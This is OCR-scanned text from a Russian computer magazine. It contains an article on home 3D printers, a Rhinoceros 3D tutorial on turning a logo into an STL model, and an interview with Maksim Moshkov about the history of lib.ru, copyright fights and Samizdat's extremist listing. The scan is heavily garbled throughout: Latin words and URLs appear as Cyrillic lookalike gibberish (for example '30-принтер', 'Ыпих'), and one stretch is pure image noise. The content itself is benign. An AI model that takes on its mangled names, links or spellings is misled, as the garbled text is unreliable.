чем если бы он доставлялся к нему стандартным образом, — 
в зависимости от того, имеется ли у него собственный принтер, 
или же он обращается к услугам посредника, занимающегося 
печатью. 

Также это открывает большие просторы для небольшого 
производства. Да, далеко не каждый продукт можно изготовить 
на 30-принтере, но распечатать можно хотя бы его прототипы 
или мастер-форму для производства — а это уже дает большую 
экономию (все это ведь тоже пришлось бы где-то заказывать 
и изготавливать) времени и средств. Кроме того, для опреде- 
ленных типов продуктов качество изготовления, внешний вид 
или сравнительно невысокая прочность не так критичны — это 
могут быть, например, вспомогательные детали более сложных 
устройств. Однако, чтобы все это стало реальностью, домаш- 
ним 30-принтерам нужно вновь пройти тот же путь, что был 
пройден промышленными устройствами, и даже больше. Им 
нужно стать доступными, сформировать экосистему сервисов 
и ПО и продолжить совершенствоваться в техническом плане. 
Давай посмотрим, что уже сделано и что нужно, чтобы стать ча- 
стью этого движения уже сейчас. 

Сами принтеры можно сравнить с дистрибутивами, и прохо- 
дят они сейчас примерно тот же путь. Большинство десктопных 
принтеров стоимостью до 2500-3000 долларов имеют плюс- 
минус одинаковые возможности и принцип работы. Большин- 
ство из них печатает модели из пластика, не более 20 санти- 
метров по каждой стороне, по схожей технологии. Основные 
векторы их развития на данном этапе — стабильность работы 
и удобство использования. Добившись этого, можно будет за- 
воевать более широкую аудиторию. Получив рынок, можно 




будет снизить стоимость (пока, увы, все действует в соответ- 
ствии с законом масштаба — если только РерРар внезапно не 
научится на самом деле воспроизводить сам себя). А снизив 
стоимость и увеличив рынок, уже можно будет заниматься ин- 
тенсивным совершенствованием технологии. Что мы имеем 
сейчас? 

Я СЛИШКОМ БЕДЕН, ЧТОБЫ ПОКУПАТЬ 
ДЕШЕВЫЕ ВЕЩИ 

30-принтеры существуют в двух видах: киты и готовые модели. 
Киты в среднем стоят до тысячи долларов, готовые модели сто- 
ят от двух до двух с половиной тысяч (если учитывать доставку 
или цены у перекупщиков). Казалось бы, самый привлекатель- 
ный способ — взять кит и заняться сборкой. Однако, увы, это 
подходит далеко не всем. Самые хардкорные киты принтера 
класса Ргиза МепРеІ потребуют от 16 до 24 часов на сборку 
(и речь будет идти о сверлении и паянии), менее сложные набо- 
ры потребуют доработки в основном по программной части — 
и это тоже достаточно нетривиальный процесс. После этого 
придется еще заниматься калибровкой осей рабочей области 
и поиском нужного материала. Несмотря на то что теоретиче- 
ски прутки бывают диаметром 1 ,75 и 3 миллиметра, некоторые 
устройства могут иметь не совсем стандартный диаметр сопла. 
Также некоторые поставщики сырья могут не совсем добросо- 
вестно следовать этим стандартам или просто делать прутки 
неравномерной толщины, что будет приводить к забиванию 





сопла (если толщина слишком большая) или обрыву мотка 
(если она слишком маленькая). В сухом остатке, главная про- 
блема китов — непредсказуемость результата. 

В общем, мораль простая: если ты все еще читаешь это, то 
копи на готовое устройство. Если ты в состоянии собрать кит, 
то, скорее всего, ты уже читаешь 103-страничную инструкцию 
по сборке в вики ВерРар. 

ГЛАВНОЕ - НАЙТИ КОНСТРУКТИВ 

Решиться на покупку такой игрушки тоже непросто. И скорее 
всего, если у тебя есть такая возможность, покупать ты его 
будешь не для домашнего использования, а для инженерных 
проектов, и тогда у тебя будут вполне конкретные критерии 
отбора. Все модели одновременно похожи в своих возможно- 
стях и сложны для однозначного сравнения — не существует 
даже принятой всеми производителями методики описания 
характеристик (таких как скорость печати или точность). Даже 
до такого банального варианта, как использование некой эта- 
лонной модели с замером времени и точности печати, рынок 
еще не дошел. 

Поэтому для простых смертных самый реалистичный на 
сегодня способ познакомиться с 30-печатью — это найти 
сообщество в твоем городе. Настоятельно рекомендуем на- 
чать именно с этого. Это может быть, например, хакерспейс 
(«Нейрон» в Москве), фаблаб (например, в МИСиСе, а к вы- 
ходу номера в печать должен открыться и в Санкт-Петербурге, 
Ы.Му/1ЫЬРЦ). Такие места есть во многих городах, проще все- 
го их найти, задав вопрос в сообществе — например в соот- 
ветствующем разделе гоЬоІогит.ги ( ЬіІ.Іѵ/гЫгтЗсі ). В общем, 
просто найди удобное тебе место и следи за обновления- 
ми на его сайте. Скорее всего, тебе нужно будет дождаться 
анонса соответствующего открытого мероприятия. Напри- 
мер, на момент написания статьи поучаствовать в воркшопе 
по 30-печати в «Нейроне» стоило 500 рублей, с собой нужно 
было принести только ноутбук с установленным бесплатным 
софтом из списка. Принтер, расходники и инструктор входят в 
стоимость :). В некоторых хакспейсах доступ к принтеру мож- 
но получить бесплатно, но для этого нужно подготовить про- 
ект и предоставить по итогам работы статью-отчет. В боль- 
шинстве подобных заведений основная активность крутится 
вокруг робототехники, поэтому если тебе интересно еще и 
это, тебе будут вдвойне рады. 

Ну а для того, чтобы сходить в фаблаб не впустую, тебе нуж- 
но подготовить главное — 30-модель. О том, как начать этим 
заниматься, читай на следующей полосе. 31 



ЗАСТЫТЬ В ПЛАСТИКЕ 

Еще одна гениальная идея, зародив- 
шаяся в сообществе Тбіпдіѵегве, — это 
30-портреты. С помощью Кіпесі — зна- 
менитого гаджета, имеющего несколько 
камер и датчики глубины, в специальной 
программе получается модель лица в 
формате 8Т1. Инструкцию можно посмо- 
треть здесь: Ь іМѵЛасеіпЗсІ . 



Новая эпоха ОІУ 



УШтакег: еще один очень 
популярный принтер, условно 
относящийся к средней 
ценовой категории , но реже 
встречающийся в России. 
Продается в готовом виде и 
как кит. Цена кита — 1200 евро, 
готового набора — 1700 евро. 







СОѴЕПЗТОЙУ 
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В предыдущей статье 
мы пытались донести 
до тебя, что лучший 
способ попробовать 
30-печать прямо сей- 
час — это найти место, 
где можно пощупать вжи- 
вую 30-принтер и внаглую 
прийти туда со своей 
моделью. Дело осталось 
за малым — нужно приго- 
товить эту модель. 




ПЕРВАЯ 

МОДЕЛЬ 



КАК МЫ 
ПОЗНАКОМИЛИСЬ 
С ТРЕХМЕРНОЙ 
ПЕЧАТЬЮ НА 
ПРИМЕРЕ 
СОБСТВЕННОГО 
ЛОГОТИПА 



ГДЕ БРАТЬ 
МОДЕЛИ 

ѵѵуущ.ііііпаіѵегзе.сот 

ішѵу.зЬаоеѵѵаѵз.сот 

ѵѵѵѵѵѵ.іпз1гисіаЫез.сот/дгоир/123сІ 

ІЬерігаІеЬаѵ.зе/Ьгощзе/605 



Д ля лучшего понимания объект, созданный в компьютере и су- 
ществующий ТОЛЬКО в электронном виде, называют моделью, 
а физическое воплощение модели, полученное тем или иным 
способом, включая 30-печать, — макетом. Начнем с моделиро- 
вания. В качестве модели мы возьмем логотип нашего журнала. 
В нашем случае изначально он сохранен в формате РОР, а наша конечная 
цель — получить трехмерную модель в формате 8Т1, и для этого нам нужен 
специальный софт. 

Выбор его у нас широк — от сложных и тяжелых Аиіосіезк АиІоСАО и Зсіз 
Мах, РИіпосегоз 30 и АгсИіСАО до бесплатных Ооодіе ЗкеІсИІІр и ВІепбег. 
В качестве наиболее наглядного для объяснения процесса мы выбрали 
ВИіпосегоз 30. Бесплатную ІгіаІ-версию сроком в 90 дней можно скачать 
с официального сайта, программа доступна как для ѴѴіпбоѵѵз, так и для Мае. 

После установки и запуска РИіпо, через Рііе — » Ітрогі загружаем наш 
Іодо.рбі В появившемся окне РОР Ітроіі Орііопз ничего не изменяем, мож- 
но начинать работу (рис. 1 ). 

Теперь нам нужно указать область, в пределах которой работает принтер 
(рис. 2). Возьмем распространенный случай — 20 см на 20 см. По умолча- 
нию наша программа ВІііпо использует миллиметры как систему единиц, так 
что наш прямоугольник задается командой Весіапдіе, где указываем раз- 
мер 200 на 200 (здесь и далее проще все команды набирать на клавиатуре, 
и отображаться они будут в командной строке в верхней части окна. Что не- 
понятно — удобный хэлп программы и гугл вам в помощь). 

Квадрат зоны печати у нас получился сильно больше, чем надпись. Мы 
увеличим ее размер, воспользовавшись командой 8са1е. Перейдем в вид 
Іор, дважды щелкнув по названию окна. Набираем команду, выделяем рам- 
кой объекты, берем опорную точку (Огідіп роіпі) за 0 (0, 0, 0 по х, у и 2 — на- 
чало координат) и вводим значение 4 (увеличение в четыре раза). 

Теперь нам нужно из линейного двумерного чертежа получить трех- 
мерное тело (в терминологии 30-печати — зоііб, замкнутый монолитный 
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Первая модель 



^3 




Рис. 1 . Начинаем работу в НЫпо 




Рис.З. Переходим в 30 




Рис. 5. Логотип объединен с подложкой 



объект). Для этого сначала перейдем в вид регзресііѵе и введем команду 
Ехігисіе (выдавливание), указываем значение 20 (20 мм). Линии теперь мож- 
но удалить (рис. 3). 

У нас получились отдельные буквы, и нужно сделать для них подложку. 
Воспользуемся боковой панелью инструментов, выбрав Ресіапдіе: 3 роіп^з. 
Указав по порядку краевые точки прямоугольника, получаем периметр над- 
писи. 

Далее указываем отступ — команда ОЛзеі. Значение дистанции — 5. 
Направление — от центра. Теперь аналогичным образом создаем из пря- 
мо-угольника объемное тело — Ехігисіе со значением 10. Получилось, 
что объекты пересекаются. Перейдем в вид ІеП (рис. 4) и поднимем объекты 
надписи командой тоѵе. Для точности привяжемся к грани подложки. 

И последнее — надо объединить надпись с подложкой, опять же превра- 
тив их в единый зоіісі. В этом нам поможет команда ВооІеапІІпіоп, следуем 
инструкциям в командной строке. Готово! Перед сохранением просмотрим 







Рис. 2. Соотносим исходный логотип с зоной печати принтера — нужно скейлить 




Рис. 4. Делаем подложку под логотипом 




Рис. 6. Добавляем красивости 



результат, выбрав режим отображения РепсІегесІ (правый клик по названию 
окна) (рис. 5). 

Дополнительно можно «навести красоту»: срезать фаски с букв, исполь- 
зуя команду С!іат^егЕсіде с параметром 0із1апсе=1. Указываем курсором 
на грани или выбираем их рамкой (рис. 6). 

И теперь экспортируем. Выделяем наш объект, Рііе Ехрог! Зеіесіесі, 
там выбираем нужный нам формат 8ТЕ. Никаких дополнительных опций 
не нужно. Формат Ьіпагу, выбираемый по умолчанию, нам подходит. 

Дальнейшие шаги — перед посылкой на печать можно проанализиро- 
вать 5ТЕ-файл на правильность. С логотипом проблемы вряд ли возникнут, 
но вот с более сложными моделями — запросто. В первую очередь это ка- 
сается пустых (непрорисованных) мест в модели. Для этого можно восполь- 
зоваться бесплатными облачными сервисами МеІ^аЬЬ (разработчик про- 
фессионального, но дорогостоящего инструмента анализа 5Т1) или более 
простым сервисом \ѵ іІІіІЗбргіп1.сот . 31 












пѵ^ЖшЙ "V 


*«ІІм 


■У 




ІЯ 1 ■ 




ІНіП^Н Ч ^Ѵ- 




«в 


м ^ 


І^І 1 ■ 




ЕНИН^Шм 


/Ѵі 






іяі 1 




КК1НКѴ|^Ш } іі 


««V Г*ч1 

'«ц^і 






ІЯ 1 1 






♦ 






І'Я^І 1 






/к*М-^ 


1 М*» _1 


1 щ^Щ 


ІЯ^І 1 










1 Вд|Н 


ІЯ 1 ^ 1 







Право читать 



«5 



ПРАВО 




МАКСИМ МОШКОВ 

ОСНОВАТЕЛЬ ив.пи 



ЫЬ.ги — одна из ключевых историй 
для Рунета. Она повлияла на многие 
последовавшие проекты как интер- 
нет-библиотек, так и различных ком- 
мерческих площадок. Это рассказ о 
положении русскоязычного цифрово- 
го контента в целом. 



/-М08НК0ѴѴ 

Все началось в 1994 году. На территории отделения мате- 
матики в президиуме Академии наук существовала компью- 
терная площадка и компьютерная группа, обеспечивавщая 
электронную почту и какие-то дополнительные службы для 
математиков. В конце 1993 года туда притащили интернет. По- 
скольку я там работал, я получил доступ. Пользоваться «в ин- 
тернете» тогда еще было нечем. Почти ничего не было. 

Мы стали ковыряться с этими технологиями. У нас тог- 
да были ѴѴАІ8, ОорИег, а где-то в середине 1994 года мы услы- 
шали, что существует еще один протокол — НТТР, и тут же все 
дружно принялись создавать веб-странички. Отделение мате- 
матики делало сайт для отделения математики, а сотрудники 
при этом ваяли еще и личные странички. Каждый выеживался, 
как мог. 

Как тогда делали веб-странички? Методом сору-разіе. 
Берем страничку автора \ЛЛЛ/\/Ѵ Тима Бернса Ли, на которой 
висит его фотка и краткая информация на английском языке. 



Каждый копипастит это к себе, переписывает текст под свою 
фамилию, со второго раза исправляет фотографию, заодно из- 
учая НТМІ методом подражания-обезьянничества. А дальше 
возникает желание что-нибудь на эту страничку накидать. Тогда 
я почти сразу и начал заливать туда свою коллекцию электрон- 
ных книжек. Домен тогда назывался ір5ип.ас.т8к.5и/~то8Іікоѵѵ. 

У нас был могучий текстовый редактор, который напи- 
сал наш сотрудник Георгий Прилипко. В редакторе была целая 
среда для поддержки программирования и для поддержки 
проектов. У нас его называли РК, на мехмате это называлось 
Микромиром. Прилипко писал на базе или по мотивам Микро- 
мира свою реализацию для рабочей станции «Беста». Микро- 
мир все-таки создавался под СМ, а РК запустили на «Бестах», 
на иміХ, а потом уже портировали в Ыпих. 

Прямо в этой среде, внутри текстового редактора, я 
выкладывал тексты. Я собирал коллекцию электронных книг 
безо всяких интернетов, начиная с 1990 года. За три года тек- 
стов у меня набралось мегабайтов на двадцать. 

Я подбирал буквально все, что находил в электронной 
форме. Были братья Стругацкие, песни, ВеаІІез, «Иисус Хри- 
стос — суперзвезда», тексты с туристическими отчетами. Все 
укладывалось по полочкам микромировской системы, в ре- 
дакторе РК. Сделав себе веб-странички, мы, как полагается, 
принялись ждать, кто туда придет. А всего российского интер- 
нета тогда было... несколько сайтов в Черноголовке, несколько 
в Курчатнике да где-то еще. Существовали достаточно боль- 
шие тусовки русскоязычных людей в американском, немецком 
и израильском интернете, но они жили там как-то... без нас. 

Медитировать на цифры мы начали еще летом 1994 
года, когда у нас были только «хомячки» с фотографией и 
ссылками типа «мое любимое хобби». Первая статистика гла- 
сила, что у меня было, условно, 13 посетителей. Не за день. 
За месяц. В следующем месяце — 27 посетителей, потом 128. 
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мя уже три раза поменялись один на другой. То есть у меня 
их два и... один, как старший ребенок, отдает младшему свое 
барахло, а ему мы покупаем новое. Потом еще раз и еще. 

На одном сервере располагается библиотека и все 
остальные сайты, которые я взял на содержание. У меня 
много (штук двадцать) ресурсов — специализированные би- 
блиотечки. И отдельный сервер отведен для системы «Самиз- 
дат» и всех ее сайтов. Он порождает более серьезную нагруз- 
ку, поэтому для него всегда используется более «взрослое» 
железо, у библиотеки сервер слабее. С 2000 года, когда я 
купил свой собственный сервер, и по сей день я использую 
Упих, Ыпих и еще раз Ыпих. Были разные поколения железок, 
которые менялись одна на другую... но всегда был ІІМІХ, кото- 
рый очень быстро стал Ыпих’ом, да так и остался. 

СОТТА САТСН ‘ЕМ АН 

Прошло примерно полгода после того, как я запустился. 

Полгода после того, как я вылез в интернет и разместил там 
свои несчастные 20 мегабайт. И я захотел иметь не 20 мега- 
байт, а все, что там было. 



За пару месяцев я облазил весь русскоязычный интер- 
нет, нашел все книжки, которые там лежали (где бы то ни 
было, в какой бы то ни было форме), и все сгреб к себе. 

Разместить их у меня просто так было невозможно, потому 
что в любом месте, где они валялись, они были в собственной 
кодировке (у кого-то ѴѴіпсІоѵѵз, у кого-то КОІ-8, ТеХ, где-то во- 
обще транслит и так далее). Все эти файлы я греб на себя и 
насильственно, мучительно преобразовывал в свой собствен- 
ный формат хранения: бестовская кодировка (практически 
перевернутая КОІ), своя разметка, подписи и так далее. 

Получаешь файл в КОІ7-Р — нужно конвертировать его 
под себя. Получаешь в кодировке ГОСТ, выясняется, что у 
тебя этой кодировки нет, и ты не понимаешь, как это делать. 
Методом тыка и подбора пишешь конвертер, который сперва 
определяет, как устроена эта кодировка, а потом конвертирует 
текст. У тебя образуется N + 1 кодировщик из еще одной коди- 
ровки на свете в твой формат. За несколько месяцев у меня 
получилось штук 15-20 таких преобразователей. Каждый при- 
ходящий текст я вручную преобразовывал и тащил к себе. 

Потом обнаружилось, что в интернете, помимо отдель- 
но лежащих страничек с книжками, попадаются выкладки 
старинных ВВ8. На них книг было достаточно много. После 
мне в руки попал СО с коллекцией текстов НаггуРап (в основ- 
ном научная фантастика), и я стал пополнять свою библиоте- 
ку оттуда. Одновременно читатели библиотеки, счет которым 



Когда мы медитировали на статистику начинающего хомячка, 
цифры были ровно такие. 

Видимо, в погоне... даже не за популярностью, а за 
объемом, дабы хоть что-то поставить на страницу, я потратил 
примерно неделю, чтобы перенести туда свою текстовую кол- 
лекцию. Заодно, кстати, научился программировать на зііеіі, 
АѴ\/К и сопутствующих языках редактирования текстов. 



НАПОЛНЯЕМ ПОЛКИ 



Формат библиотеки — ріаіп іехі. 76 символов по ширине, так 
форматировал нам редактор РК — там ровная правая грань, 
и кое-какая смысловая разметка включалась и выключалась 
с помощью парных А5СІІ управляющих символов. В редакто- 
ре РК была разметка для включения курсива, подчеркивания, 
жирности, тусклости. Ровно этими разметками я и баловался, 
причем в какой-то момент сократив их до минимума — оста- 
лось только выделение жирным. Впрочем, через некоторое 
время я подумал и решил, что хоть это и ріаіп Іехі, но с НТМІ, 
который мы вгоним внутрь, тоже ничего не случится. Поэтому 
моя базовая текстовая разметка осталась, но какую-то экзо- 
тику я делал НТМГ’ем. Сами файлы 
хранятся в М. До сих пор каждый 
запрос швыряет результат конвер- 
тации. Впрочем, несколько лет на- 
зад я все же выкатил перед этим на 
фронт кеширующий прокси, кото- 
рый все это потихоньку кеширует. 

К сожалению, структура ЫЬ. 
ги создавалась, когда материа- 
лов было 20 мегабайтов. Систе- 
ма была такая: верхняя точка, под 
ней директории, каждая из которых 
была автором. Когда авторов трид- 
цать — это удобно. Потом, когда 
их стало больше, я спохватился и 
понял, что у меня есть фантастика, 
проза, поэзия и в каждом жанре 
свои авторы. Я сделал второй уро- 
вень — жанры. С тех пор система 
двухуровневая: жанр, а внутри ле- 
жат авторы. Система не очень удоб- 
ная, но вполне работоспособная. 

Я категорически не хотел ру- 
ками верстать НТМи-код. У меня 
уже была система хранения, были 
файлы, были подписи к ним. Идея 
заключалась в том, чтобы взять это 
и, ничего не меняя внутри, транс- 
портировать в НТТР. Поэтому я пи- 
сал СОІ-скрипты, заодно выучив, 
что это такое. Я создал конвертер, который подхватывал мою 
систему хранения обычных файлов, превращая их в НТМГ. 

Эти скрипты запускались конвейером, штук по шесть 
на каждый клик. Нужно было взять файл, преобразовать его 
в мою разметку; это делалось несколькими преобразователя- 
ми, да еще нужно было кодировку подставить. В общем, когда 
возникла хоть какая-то посещаемость, мы быстро обнаружи- 
ли, что серверу становится... немного тяжеловато. 

Тогда я выучил язык программирования РегІ, на котором 
все это можно осуществить не с помощью пяти скриптов, а при 
помощи одной не очень большой программы. 

С тех самых времен, библиотека представляет собой 
голое дерево файлов (с директорными описательными фай- 
лами) с СОІ-скриптом-преобразователем, который на ходу 
лепит всю эту лавочку. С тех пор ничего не менялось. Разуме- 
ется, я что-то подкручивал, реализовывал дополнительные 
фичи, вроде поиска и индексатора, но дизайн и структура не 
изменялись. Как выкладывал все на текстовом редакторе РК, 
реализованном с помощью Етасз, так до сих пор размещаю. 

Все это стояло в Академии наук. Потом через какое-то 
время мне предоставил площадку сайт «Чертовы кулички», 
где я благополучно располагался. У них, по-моему, стояла 
РгееВЗО, а может быть, и Ыпих. 

Последние 8-10 лет ЫЬ.ги находится в МІО, на техпло- 
щадке РТКомм. Там у меня два сервера, которые за это вре- 
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ТЕКСТОВЫЕ РЕДАКТОРЫ 

С Микромиром нас, студентов, познакомили в 1985 
году. Тогда на мехмате стояли компьютеры СМ-4 под опе- 
рационной системой В5Х-11 . На базе этой ОС были тесты, 
какие-то программы для обучения и среда с текстовым 
редактором Микромир. 

Сравнивать его с VI несерьезно. VI и сейчас совер- 
шенно неработоспособен. А VI тогда... тогда он уже был, 
но, в 1985 году сунувшись в редактор Микромир, я до сих 
пор им и пользуюсь. Хотя это уже не сам Микромир, а его 
продолжатель — редактор РК. 

Когда я перебрался на ІІЫІХ-компьютеры, там не 
было редактора РК, был только VI, которым ни один 
нормальный человек пользоваться не может. То есть мо- 
жет, конечно, и я могу, но это редактор, сделанный против 
человеческих мозгов. 

Поэтому когда я перебрался с «Бест» на большие 
иЫІХ-компьютеры (51ІМ 8рагк), там были только VI и 
Етасз. Етасз гораздо более могучий редактор, но он 
тоже сделан против человеческой логики. Любые базовые 
команды там — против любого здравого смысла и ощуще- 
ний нормального человека. 

Я был вынужден сесть за макросы этого самого 
Етасв. Язык программирования макросов там Ызр. Я ко- 
вырялся где-то три или четыре недели, так как просто не 
мог им пользоваться. На редакторе Етасв я программи- 
ровал себе редактор РК. Просто брал базовые команды из 
РК. которые привык иметь в штатных кнопках, описывал их 
кодом на Ызр и вешал на те же кнопки. С тех пор, где-то с 
1991-1992 годов, я пользуюсь этим самым редактором РК, 
написанным на Етасз. 
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ГИГАБАЙТ ЗАНИ- 
МАЕТ НА НОУТБУ- 
КЕ МОШКОВА 
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105 ГИГАБАЙТ 
ЗАНИМАЕТ 
«САМИЗДАТ» 



уже шел на сотни (сперва в месяц, а потом уже и на сотни в 
день), начали присылать книжки. 

Получилось так: первый этап — я все тащил к себе. По- 
том нашел старые архивные подборки, и это была очень се- 
рьезная коллекция. На фидошных ВВ5 хранились тысячи тек- 
стов, в количествах мегабайтов по 300, а то и по 500. А потом 
книги начали присылать люди. Тогда я забросил поиски, про- 
сто сел и «подставил руки». Каждый день кто-нибудь присылал 
мне по 10-15 книг. Никаких требований тогда не было. Я пи- 
сал всем: «давайте мне файл, я разберусь». Файл присылали, 
и, если мне везло, он был в формате, с которым я уже имел 
дело. Я натравливал на него уже написанный скрипт и на вы- 
ходе получал свой формат, а затем просто выкладывал файл и 
подписывал. Если файл присылали в чем-то экзотическом, я 
дописывал свои конвертеры и опять же — выкладывал файл. 

Кто присылал книги? Если бы я знал. Для меня в 90% слу- 
чаев существовали только е-таіГы. Были люди, которые при- 
сылали много книг, с ними я рано или поздно знакомился. Но 
чаще люди одну-две книги присылали, исправляли, заменяли; я 
письмо получал, говорил «спасибо», и на этом мы расставались. 

Нельзя сказать, что слали что-то конкретное. Фактиче- 
ски все, что сейчас есть в библиотеке, мне прислали. Фанта- 
стики там, конечно, было много, но присылали и классику, и 
переводников, и эзотерику, которую я бы сейчас уже не взял 
ни за что. Валилось все. Очень широкий спектр. 

Когда книги присылают тысячи людей, то выделять 
что-то одно бессмысленно. Тысяча человек, и у каждого 
своя собственная кривая распределения любых книг. Все 
складывается вместе. 

А вот разобраться с авторскими правами очень сложно 
и хлопотно, даже имея крупный коммерческий проект с боль- 
шими деньгами и занимаясь оцифровкой книг. Нужно браться 
за это всерьез. 



ВЕСЬ ЭТОТ КОПИРАЙТ 



Я писал всем: «давайте мне файл, 
я разберусь». Файл присылали, и, если 
мне везло, он был в формате, с которым 
я уже имел дело 



Вначале, много лет подряд, ни у кого не возникало ника- 
ких вопросов, в то время каждый брал то, что хотел. Было 
много специализированных библиотек, которые интересо- 
вала некая отдельно взятая тема. Они выходили в интернет и 
собирали все на эту тему. Были и, напротив, универсальные 
библиотеки, которые тянули на себя все подряд. 

Я всегда ставил ссылки, если тексты пришли ко мне из 
каких-то конкретных библиотек. Если же тексты попадали ко 
мне прямой почтой, то я писал, только кто их прислал, кто гото- 



Интервью 
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в 2000 году я подрядил своего знакомого, Пашу Петри- 
енко, заняться программированием «Самиздата». Тогда у 
меня появились деньги от первой рекламы. Я решил — зачем 
мучиться, найму на деньги от рекламы программиста, и он будет 
писать мне сайт. Уже 12 лет он пишет движок «Самиздата» под 
моим чутким руководством. Я даю указания, объясняю. С перво- 
го, второго, третьего раза у нас получается то, что мне хочется. 

Понятно, что читать 80% авторов «Самиздата»... лучше 
бы не читать их вовсе. Из оставшихся 20% действительно вы- 
дающихся тоже немного, хотя такие, безусловно, есть. Но все 
это не мешает им становиться более-менее известными и рас- 
крученными. Так что некоторые фамилии авторов, кто в «Самиз- 
дате» довольно давно, — на слуху у многих. 

Конечно, Стругацких у нас в «Самиздате» не родилось, 
но их не родилось нигде. Хотя сама модель правильная. Вот 
Сергей Лукьяненко был еще до интернета, но стал знаменит и 
популярен благодаря ему. После того как сняли кино, Лукьянен- 
ко вообще перешагнул на следующую ступень — он стал не по- 
пулярным фантастом, он просто стал популярным. Но не будь 
интернета, узнал бы кто-нибудь из киноделов, что есть такой 
автор? Мог узнать, а мог и не узнать. То же самое может проис- 
ходить с «Самиздатом». 

Пока «Самиздат» авторов выносит наверх. То есть спер- 
ва «Самиздат», потом десятки тысяч читателей, а потом автора 
берут в бумажную печать. Таких, кто печатается, примерно че- 
ловек 700-1000. Некоторые из них, несколько десятков чело- 
век, печатаются довольно неплохо. 

Заработок на «Самиздате»... не знаю. Я часто наблюдаю, 
что у многих авторов прямо на страничках написано: «Если вам 
нравится моя книжка, вот мой номер счета». Не знаю, работа- 
ет ли это, но такие надписи я вижу очень у многих. Возможно, 
это работает. Сейчас в «Самиздате» 70 тысяч человек, и он уже 
шесть лет запрещен в Узбекистане, пару лет запрещен в Ка- 
захстане. По слухам, он запрещен также в Киргизии. Причины 
этого мне не докладывали, но, думаю, они достаточно очевид- 
ны. Какой-нибудь диссидент (из тамошних) или родственник, 
видимо, пишет что-то этакое и размещает на «Самиздате». 

У нас в стране тоже начали играть в эти игры. Позже, чем 
в Узбекистане, но приступили тотально. Найти на «Самиздате» 
что-то, что можно запретить, можно всегда, и, даже если там 
нет ничего запрещенного, ничего не стоит в любой момент это 
туда принести. 

Три года назад некий пенсионер из города Череповца 
боролся с местными чиновниками за экологию окружаю- 
щего пространства. Он выступал против нарушений эколо- 
гии Череповецким металлургическим. Активно писал жалобы, 
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ВИЛ, кто оцифровывал. Но библиотека, в ко- 
торую можно просто выкладывать книжки... 
все это осталось в коммунистическом про- 
шлом. Это тогда у нас был энтузиазм, и ни- 
кто не знал, чего хочет, но все точно хотели, 
чтобы всем было хорошо. Лет 10-15 назад в 
такое можно было верить. 

Было время, когда я считал, что мы 
соберем все книги на свете. Вообще ВСЕ. 

Ведь получалось, что у меня есть система, 
где много книг, куда приходят читатели, и 
читатели эту систему сами же пополняют. 

Казалось, что мы соберем всё. 

А потом полезла фигня с авторскими 
правами и стало ясно — не собрать нам 
все книжки на свете. Либо нужно много 
миллионов денег, чтобы все их оцифровать, 
положить в ящик и оставить там. Потому 
что технически авторское право позволяет 
оцифровать все книги на свете. Но что ты 
будешь делать с этими книгами дальше? 

Торговать ими поштучно? Можно. А вот пре- 
доставить доступ к этим книгам всем жела- 
ющим, как в библиотеке, — нельзя. 

Тогда прошло несколько лет после 
первого интернет-бума. Все возникло, 
все пару раз продали, потом все рухнуло, 
но ощущение, что в интернете можно делать 
деньги, осталось у многих. У многих зашеве- 
лилась в мозгу мысль: «давайте придумаем, 
на чем в интернете действительно можно сделать денег». 

Сейчас мы наблюдаем массу коммерческих проектов, 
выросших из того, что люди просто сидели и придумывали 
«как». Есть истории полного успеха, есть частичного. В конце 
концов, ярчайший пример — Арріе с торговлей песнями или 
программками для іРІіопе. Взяли и на пустом месте придума- 
ли, как заработать денег. Идея торгануть книжками, торгануть 
файлами и заработать денег тогда тоже сидела у кого-то в 
мозгу. Как я понимаю, «КМ онлайн» решили, мол, мы сейчас 
книгами поторгуем и станем торговцами книгами. 

Однако главный вопрос в том, как организовать торгов- 
лю книжками в интернете, где этих самых книжек изряд- 
но. «КМ» пошел по одному из возможных путей. Сперва они 
прибрали к себе множество файлов, потом просто натырили 
файлов у всех остальных бесплатных библиотек. Затем нужно 
было включать торговлю, но торговле сильно мешало наличие, 
с одной стороны, бесплатных библиотек, а с другой — полное 
отсутствие договоренностей с авторами. 

Возникла проблема, которую нужно было решать. «КМ 
онлайн» решили проблему следующим способом: устроили 
скандал, подняли шумиху и попытались прикрыть все бес- 
платные библиотеки. Скандал у них получился, шумиха тоже, 
но бесплатные библиотеки закрыть не вышло. Хотя библиоте- 
ки, безусловно, поняли тот месседж, который им прилетел, и 
тоже стали двигаться. 

Главная проблема «КМ онлайн» — их торговля приноси- 
ла очень мало денег. Они тратили куда больше. Расходы шли 
на ПО, на закупку прав, на содержание людей, которые всем 
этим занимались... деньги утекали, а приходило в несколько 
раз меньше. Вопрос — на сколько хватит твоего «кармана», 
долго ли ты сможешь держаться и ждать, когда у тебя подрас- 
тет приработок и ты начнешь меньше тратить и больше зара- 
батывать? Они не дождались. 

Скандал с погоней за библиотеками был просто кусоч- 
ком их плана. Они выбрали тактику наступления, на которую 
им не хватило денег. Проект закрылся. 

После разбирательств с «КМ» я заручился поддержкой 
авторов. В основном книги этих авторов и остались в ЫЬ.ги. 
Добавлять новые книги стало рискованно. 



«САМИЗДАТ» 



На сегодня наибольший интерес представляет система 
«Самиздат». Интерес к библиотеке давно остыл, а «Самиз- 
дат» — мой самый большой, самый мощный и самый расту- 
щий проект. 
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доносы, прокламации, расклеивал листовки и требовал снять 
с должности чиновников, которые потворствуют всему этому. 
Его решили остановить. 

Его самого никто не судил. Подали в суд против листовок. 
Листовки признали экстремистскими (снять с должностей чи- 
новников — призыв к свержению действующей государствен- 
ной власти) и подлежащими удалению. Предписание суда 
гласило: «удалить материалы этих листовок, расположенные 
по адресу такому-то», — у пенсионера был «хомячок» с этими 
листовками. А еще у него была страница на «Самиздате». Но 
так как адрес странички на «Самиздате» — это для них слишком 
сложно, они написали просто: «также материалы, расположен- 
ные по адресу \ллллл/. 2 ІіигпаІ.ІіЬ.ги». 

Есть реестр, который создали только сейчас — этой 
осенью, а еще есть список экстремистских материалов, 
который ведет Минюст. Это разные вещи. «Самиздат» попал в 
список экстремистских материалов по решению умника-судьи. 
Механизма по изъятию материалов из списка Минюста нет. То 
есть он есть, но нужно подавать в суд, опротестовать само дело, 
в котором было решение. А наше дело замечательно тем, что 
там даже человека нет — судили листовки. В конце концов я 
отчаялся с этим разбираться, подарил Минюсту домен, перена- 
правил указатели и на этом успокоился. «Самиздат» я перевел 
на другой домен (затІіЬ.ги), который в их списках не значится. 

ЧЕМ НАКОРМИТЬ ВСЕХ АВТОРОВ 

После «КМ» начался «ЛитРес». Он организовался из не- 
скольких бесплатных библиотек, которые больше всего по- 
страдали от «КМ онлайн». Они занялись той же торговлей 
